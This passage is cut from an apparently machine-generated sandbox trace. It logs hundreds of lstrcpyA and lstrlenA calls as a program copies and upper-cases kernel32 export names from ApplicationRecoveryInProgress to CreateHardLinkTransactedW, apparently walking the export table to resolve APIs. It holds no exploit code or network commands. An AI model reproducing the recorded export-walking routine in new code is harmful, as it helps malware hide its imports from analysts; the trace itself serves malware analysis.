returned="ApplicationRecoveryInProgress" [0087.122] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.122] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.122] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.122] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.122] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.122] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.122] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.122] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.122] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.123] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.123] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.123] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.123] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.123] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.123] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.123] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.123] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.123] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.123] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.123] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.123] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.123] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.123] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.123] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.123] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.123] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.123] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.124] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.124] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.124] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.124] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.124] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.124] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.124] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.124] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.124] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.124] lstrlenA (lpString="BEEP") returned 4 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.124] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.124] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.124] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.124] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.124] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.124] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.124] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.124] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.124] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.125] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.125] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.125] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.125] lstrlenA (lpString="CANCELIO") returned 8 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.125] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.125] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.125] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.125] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.125] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.125] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.125] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.125] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.125] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.125] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.125] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.125] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.125] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.125] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.125] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.126] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.126] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.126] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.126] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.126] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.126] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.126] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.126] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.126] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.126] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.126] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.126] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.126] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.126] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.126] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.126] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.126] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.126] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.126] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.127] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.127] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.127] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.127] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.127] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.127] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.127] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.127] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.127] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.127] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.127] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.127] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.127] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.127] lstrlenA (lpString="COPYFILEA") returned 9 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.127] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.127] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.127] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.127] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.127] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.128] lstrlenA (lpString="COPYFILEW") returned 9 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.128] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.128] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.128] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.128] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.128] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.128] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.128] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.128] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.128] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.128] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.128] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.128] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.128] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.128] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.128] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.128] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.128] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.128] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.129] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.129] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.129] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.129] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.129] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.129] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.129] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.129] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.129] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.129] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.129] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.129] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") 